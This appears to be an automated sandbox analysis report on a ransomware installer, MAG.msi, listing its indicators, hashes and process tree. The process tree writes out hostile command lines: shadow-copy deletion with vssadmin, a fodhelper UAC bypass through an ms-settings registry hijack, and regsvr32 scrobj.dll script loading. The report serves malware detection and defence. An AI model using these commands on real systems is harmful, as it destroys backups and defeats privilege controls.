Analysis
- max time kernel: 150s
- max time network: 152s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 23-05-2022 05:17
Static task: static1
Behavioral task: behavioral1 (Sample: MAG.msi; Resource: win7-20220414-en)
Behavioral task: behavioral2 (Sample: MAG.msi; Resource: win10v2004-20220414-en)
General
- Target: MAG.msi
- Size: 96KB
- MD5: 957d0c81c985609c580565a0323a14cd
- SHA1: d8d46413409a14a1ae407107016e28074c6824d5
- SHA256: 9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be
- SHA512: 0ff024ff07ab13e7d308429fd8906560e58610b63a7dd468f6b5b6c86221962dbc27e93090e5607104201e9cabe90b52affba54411a541f5c2f5369db231cf52
Malware Config
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies extensions of user files (9 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: MsiExec.exe
  - File renamed: C:\Users\Admin\Pictures\ImportTrace.tif => C:\Users\Admin\Pictures\ImportTrace.tif.meemybio
  - File renamed: C:\Users\Admin\Pictures\StepOpen.tiff => C:\Users\Admin\Pictures\StepOpen.tiff.meemybio
  - File renamed: C:\Users\Admin\Pictures\SubmitUnregister.crw => C:\Users\Admin\Pictures\SubmitUnregister.crw.meemybio
  - File renamed: C:\Users\Admin\Pictures\CompressSend.png => C:\Users\Admin\Pictures\CompressSend.png.meemybio
  - File renamed: C:\Users\Admin\Pictures\ExportInitialize.png => C:\Users\Admin\Pictures\ExportInitialize.png.meemybio
  - File renamed: C:\Users\Admin\Pictures\MountTest.png => C:\Users\Admin\Pictures\MountTest.png.meemybio
  - File renamed: C:\Users\Admin\Pictures\PushConvertFrom.tif => C:\Users\Admin\Pictures\PushConvertFrom.tif.meemybio
  - File renamed: C:\Users\Admin\Pictures\RemoveExport.tif => C:\Users\Admin\Pictures\RemoveExport.tif.meemybio
  - File opened for modification: C:\Users\Admin\Pictures\StepOpen.tiff
- Loads dropped DLL (1 IoCs)
  Processes: MsiExec.exe (PID 1312)
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes: msedge.exe
  - Key created: \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run
- Enumerates connected drives (3 TTPs, 48 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: msiexec.exe, msiexec.exe (two instances)
  - File opened (read-only): \??\A:, \??\B:, \??\E:, \??\F:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z: (24 drive letters, each appearing twice across the two msiexec.exe instances; C: and D: are not in the list)
- Suspicious use of SetThreadContext (3 IoCs)
  Processes: MsiExec.exe
  - PID 1312 MsiExec.exe set thread context of PID 2384 sihost.exe
  - PID 1312 MsiExec.exe set thread context of PID 2396 svchost.exe
  - PID 1312 MsiExec.exe set thread context of PID 2492 taskhostw.exe
- Drops file in Program Files directory (2 IoCs)
  Processes: setup.exe
  - File created: C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\107f4e32-2c97-4e9b-93cb-053a08abb1ac.tmp
  - File opened for modification: C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220523071826.pma
- Drops file in Windows directory (9 IoCs)
  Processes: msiexec.exe
  - File opened for modification: C:\Windows\Installer\e57bb8f.msi
  - File opened for modification: C:\Windows\Installer\MSIBDB2.tmp
  - File opened for modification: C:\Windows\Installer\MSIC39F.tmp
  - File created: C:\Windows\Installer\e57bb8f.msi
  - File opened for modification: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
  - File opened for modification: C:\Windows\Installer\
  - File created: C:\Windows\Installer\inprogressinstallinfo.ipi
  - File created: C:\Windows\Installer\SourceHash{ACB5AE58-BF5F-4C81-8759-EF28BCB9E5CA}
  - File created: C:\Windows\Installer\e57bb91.msi
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks SCSI registry key(s) (3 TTPs, 64 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes: svchost.exe, vssvc.exe
  - svchost.exe: Key opened / Key value queried operations under \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 and \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 (Properties\{GUID}\NNNN subkeys plus Capabilities, Mfg, HardwareID, CompatibleIDs and FriendlyName)
  - vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr; Set value (data) on Device Parameters\Partmgr\PartitionTableCache and Device Parameters\Partmgr\SnapshotDataCache under the same Disk key (raw entry list and binary values omitted)
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: msedge.exe
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
- Interacts with shadow copies (2 TTPs, 6 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PIDs 2332, 1268, 964, 2140, 60, 2620)
- Modifies data under HKEY_USERS (1 IoCs)
  Processes: svchost.exe
  - Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
- Modifies registry class (18 IoCs)
  Processes: msedge.exe, sihost.exe, regsvr32.exe (three instances)
  - msedge.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
  - sihost.exe: Set value (int) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"
  - sihost.exe: Set value (int) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"
  - regsvr32.exe: Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings (2 entries), \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell (2 entries), \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open (2 entries), \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command (3 entries)
  - regsvr32.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute (3 entries)
  - regsvr32.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb" (3 entries)
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  Processes: msiexec.exe (PID 4532, 2 entries), MsiExec.exe (PID 1312, 2 entries), msedge.exe (PID 8, 2 entries), msedge.exe (PID 1440, 2 entries), identity_helper.exe (PID 2768, 2 entries)
- Suspicious behavior: MapViewOfSection (3 IoCs)
  Processes: MsiExec.exe (PID 1312, 3 entries)
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (5 IoCs)
  Processes: msedge.exe (PID 1440, 5 entries)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: msiexec.exe, msiexec.exe, vssvc.exe, srtasks.exe
  - PID 5104 msiexec.exe: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
  - PID 4532 msiexec.exe: SeSecurityPrivilege, SeBackupPrivilege, then SeRestorePrivilege and SeTakeOwnershipPrivilege alternating, repeated many times
  - PID 2392 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  - PID 548 srtasks.exe: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege
- Suspicious use of FindShellTrayWindow (4 IoCs)
  Processes: msiexec.exe (PID 5104, 2 entries), msedge.exe (PID 1440, 2 entries)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: msiexec.exe, svchost.exe, sihost.exe, taskhostw.exe, MsiExec.exe, cmd.exe, msedge.exe
  - PID 4532 msiexec.exe wrote to memory of PID 548 srtasks.exe
  - PID 4532 msiexec.exe wrote to memory of PID 1312 MsiExec.exe
  - PID 2396 svchost.exe wrote to memory of PID 944 regsvr32.exe
  - PID 2384 sihost.exe wrote to memory of PID 1144 regsvr32.exe
  - PID 2492 taskhostw.exe wrote to memory of PID 1156 regsvr32.exe
  - PID 1312 MsiExec.exe wrote to memory of PID 2628 cmd.exe
  - PID 2628 cmd.exe wrote to memory of PID 1440 msedge.exe
  - PID 1440 msedge.exe wrote to memory of PID 3704 msedge.exe
  - PID 1440 msedge.exe wrote to memory of PID 4548 msedge.exe (repeated many times)
  - PID 1440 msedge.exe wrote to memory of PID 8 msedge.exe
  - PID 1440 msedge.exe wrote to memory of PID 860 msedge.exe
  (each parent/child pair above appears two or more times in the raw list)
Processes
-
[depth 1] C:\Windows\system32\sihost.exe
    sihost.exe
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
      - Modifies registry class
  [depth 2] C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
    [depth 3] C:\Windows\system32\fodhelper.exe
        fodhelper.exe
      [depth 4] C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        [depth 5] C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            - Interacts with shadow copies
  [depth 2] C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
    [depth 3] C:\Windows\system32\fodhelper.exe
        fodhelper.exe
      [depth 4] C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        [depth 5] C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            - Interacts with shadow copies
[depth 1] C:\Windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
      - Modifies registry class
  [depth 2] C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
    [depth 3] C:\Windows\system32\fodhelper.exe
        fodhelper.exe
      [depth 4] C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        [depth 5] C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            - Interacts with shadow copies
  [depth 2] C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
    [depth 3] C:\Windows\system32\fodhelper.exe
        fodhelper.exe
      [depth 4] C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        [depth 5] C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            - Interacts with shadow copies
[depth 1] C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
    - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
      - Modifies registry class
  [depth 2] C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
    [depth 3] C:\Windows\system32\fodhelper.exe
        fodhelper.exe
      [depth 4] C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        [depth 5] C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            - Interacts with shadow copies
  [depth 2] C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
    [depth 3] C:\Windows\system32\fodhelper.exe
        fodhelper.exe
      [depth 4] C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        [depth 5] C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            - Interacts with shadow copies
[depth 1] C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\MAG.msi
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
[depth 1] C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    - Enumerates connected drives
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      - Suspicious use of AdjustPrivilegeToken
  [depth 2] C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 05BCD37A0E5588B5EF7FD2ED87E41176
      - Modifies extensions of user files
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\System32\cmd.exe
        cmd /c "start microsoft-edge:http://fa480838f6meemybio.cryless.info/meemybio^&1^&43548853^&81^&417^&2219041
        - Suspicious use of WriteProcessMemory
      [depth 4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://fa480838f6meemybio.cryless.info/meemybio&1&43548853&81&417&2219041
          - Adds Run key to start application
          - Enumerates system info in registry
          - Modifies registry class
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of WriteProcessMemory
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9211946f8,0x7ff921194708,0x7ff921194718
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
            - Suspicious behavior: EnumeratesProcesses
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3204 /prefetch:8
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5184 /prefetch:8
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5512 /prefetch:8
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
            - Drops file in Program Files directory
          [depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7f23c5460,0x7ff7f23c5470,0x7ff7f23c5480
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
            - Suspicious behavior: EnumeratesProcesses
        [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3596 /prefetch:8
[depth 1] C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    - Checks SCSI registry key(s)
    - Suspicious use of AdjustPrivilegeToken
[depth 1] C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
    - Checks SCSI registry key(s)
    - Modifies data under HKEY_USERS
[depth 1] C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
[depth 1] C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Public\glvt6878zb
Filesize 1KB
MD5 fe4a708f201a02075821a3adfbf46722
SHA1 0043a0976efb85b573fa959f7db59ff3ea751561
SHA256 e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893
SHA512 cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a
-
C:\Users\Public\rtuvkf9dn
Filesize 3KB
MD5 9287a7c05440f4fba02ddc00bbc0d2dc
SHA1 d6d4fd6acec6367ab60e52025090c95b03470812
SHA256 27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2
SHA512 522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae
-
C:\Windows\Installer\MSIBDB2.tmp
Filesize 52KB
MD5 d6959db7ef3dd8a1d7576dc07b58ac20
SHA1 5d61f82d962bca473eb499a97dd8bd2b0c89787d
SHA256 e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c
SHA512 e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1
-
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
Filesize 23.0MB
MD5 afc0194808d23b11be1a18aef9e10231
SHA1 14e204a1207e98a027ff36a6a69b11d5969682bc
SHA256 2a0de9dcf6962a0724ccb9be7c3bd4cb6243a23be6da9be68c5b4258008f528d
SHA512 18334fda61fef82440c4e65b813bd2fc1602c339632ca11118a30a749fc5be15f94aa3d7a1e16874bdaaf7dd7e9c4f462963939be16fbb86374f13f68ee4050a
-
\??\Volume{c8b84e5a-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{8a04187e-bddd-4be7-adb4-759449331aa1}_OnDiskSnapshotProp
Filesize 5KB
MD5 814f9267a3d558df0d00ffdbec7a4948
SHA1 00cf74bd8c222add8811962adb1da3994512475a
SHA256 e246fbed087412a7925a3d23feb8c2ee0e52a5541e669fcb942e1c9f43a963e5
SHA512 09e0fe6b11c55ec3a728600a224dfcaaf9d16a19c31a3c5fb87fec93d607f7dee33d1d5e1028a0f5d5c3662fff7e05efe4dfdb700249937244e0b67d7dd86587
-
\??\pipe\LOCAL\crashpad_1440_EMJPZEEFKKUVNQAE
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/8-151-0x0000000000000000-mapping.dmp
-
memory/60-195-0x0000000000000000-mapping.dmp
-
memory/60-164-0x0000000000000000-mapping.dmp
-
memory/408-167-0x0000000000000000-mapping.dmp
-
memory/428-181-0x0000000000000000-mapping.dmp
-
memory/548-130-0x0000000000000000-mapping.dmp
-
memory/620-158-0x0000000000000000-mapping.dmp
-
memory/628-162-0x0000000000000000-mapping.dmp
-
memory/688-163-0x0000000000000000-mapping.dmp
-
memory/808-198-0x0000000000000000-mapping.dmp
-
memory/860-154-0x0000000000000000-mapping.dmp
-
memory/944-138-0x0000000000000000-mapping.dmp
-
memory/964-175-0x0000000000000000-mapping.dmp
-
memory/1080-193-0x0000000000000000-mapping.dmp
-
memory/1144-139-0x0000000000000000-mapping.dmp
-
memory/1156-141-0x0000000000000000-mapping.dmp
-
memory/1156-185-0x0000000000000000-mapping.dmp
-
memory/1156-177-0x0000000000000000-mapping.dmp
-
memory/1268-174-0x0000000000000000-mapping.dmp
-
memory/1268-191-0x0000000000000000-mapping.dmp
-
memory/1312-131-0x0000000000000000-mapping.dmp
-
memory/1312-140-0x00000222F4DF0000-0x00000222F4DFC000-memory.dmp
Filesize 48KB
-
memory/1440-147-0x0000000000000000-mapping.dmp
-
memory/1488-192-0x0000000000000000-mapping.dmp
-
memory/1896-186-0x0000000000000000-mapping.dmp
-
memory/1932-188-0x0000000000000000-mapping.dmp
-
memory/2140-194-0x0000000000000000-mapping.dmp
-
memory/2148-170-0x0000000000000000-mapping.dmp
-
memory/2220-182-0x0000000000000000-mapping.dmp
-
memory/2332-173-0x0000000000000000-mapping.dmp
-
memory/2384-142-0x0000021BA90F0000-0x0000021BA90F3000-memory.dmp
Filesize 12KB
-
memory/2620-196-0x0000000000000000-mapping.dmp
-
memory/2628-144-0x0000000000000000-mapping.dmp
-
memory/2652-179-0x0000000000000000-mapping.dmp
-
memory/2768-184-0x0000000000000000-mapping.dmp
-
memory/2840-187-0x0000000000000000-mapping.dmp
-
memory/3156-189-0x0000000000000000-mapping.dmp
-
memory/3188-168-0x0000000000000000-mapping.dmp
-
memory/3580-166-0x0000000000000000-mapping.dmp
-
memory/3704-148-0x0000000000000000-mapping.dmp
-
memory/3736-183-0x0000000000000000-mapping.dmp
-
memory/3764-169-0x0000000000000000-mapping.dmp
-
memory/4196-190-0x0000000000000000-mapping.dmp
-
memory/4252-156-0x0000000000000000-mapping.dmp
-
memory/4352-171-0x0000000000000000-mapping.dmp
-
memory/4380-160-0x0000000000000000-mapping.dmp
-
memory/4548-150-0x0000000000000000-mapping.dmp
-
memory/4852-165-0x0000000000000000-mapping.dmp